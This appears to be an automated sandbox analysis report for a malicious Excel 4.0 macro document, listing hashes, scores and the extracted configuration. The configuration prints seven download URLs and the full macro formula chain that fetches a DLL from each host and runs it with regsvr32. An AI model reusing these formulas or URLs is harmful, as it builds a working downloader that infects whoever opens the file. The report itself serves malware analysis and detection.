General

  • Target

    56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a

  • Size

    29KB

  • Sample

    240909-1wcweasdmq

  • MD5

    c21157422bc9b05232891a332c35a2fd

  • SHA1

    791f2d9c8178c44de752136047bd9a33b040daad

  • SHA256

    56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a

  • SHA512

    72e60f84edb0dcdec5b147723583d749c9c011a2a745c1614eb538189bbc8a0e4beb3953c8b9eabab24feba2b6c985136128c541ad824899e9adb61ecdf0db62

  • SSDEEP

    384:EC7TmBkUnAKBmnAcLK5J9AVs6TeEB/g4Bmq3FrEBTqxGFzHHnjCMf4VdnIEk8DY:EC7TUnAKmD4ys2ewg4F32BlHHOx1vjs

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://www.casache.com/web/gTj3TrZ/

https://www.aulavirtualapecc.com/server/oib/

http://30aweddingco.com/cgi-bin/QUx/

http://blacksmithbooks.com/blog/OkmsfYUA/

http://consultores-sic.com/fw/AOOfOtj1qqgLWR/

http://www.tugarden.com/docs/csv_import/xGmX9fs73iJl/

https://damjangro.org/data/XPMJ/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.casache.com/web/gTj3TrZ/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.aulavirtualapecc.com/server/oib/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://30aweddingco.com/cgi-bin/QUx/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blacksmithbooks.com/blog/OkmsfYUA/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consultores-sic.com/fw/AOOfOtj1qqgLWR/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.tugarden.com/docs/csv_import/xGmX9fs73iJl/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/XPMJ/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()

Targets

    • Target

      56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a

    • Size

      29KB

    • MD5

      c21157422bc9b05232891a332c35a2fd

    • SHA1

      791f2d9c8178c44de752136047bd9a33b040daad

    • SHA256

      56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a

    • SHA512

      72e60f84edb0dcdec5b147723583d749c9c011a2a745c1614eb538189bbc8a0e4beb3953c8b9eabab24feba2b6c985136128c541ad824899e9adb61ecdf0db62

    • SSDEEP

      384:EC7TmBkUnAKBmnAcLK5J9AVs6TeEB/g4Bmq3FrEBTqxGFzHHnjCMf4VdnIEk8DY:EC7TUnAKmD4ys2ewg4F32BlHHOx1vjs

    Score
    3/10

MITRE ATT&CK Enterprise v15

Tasks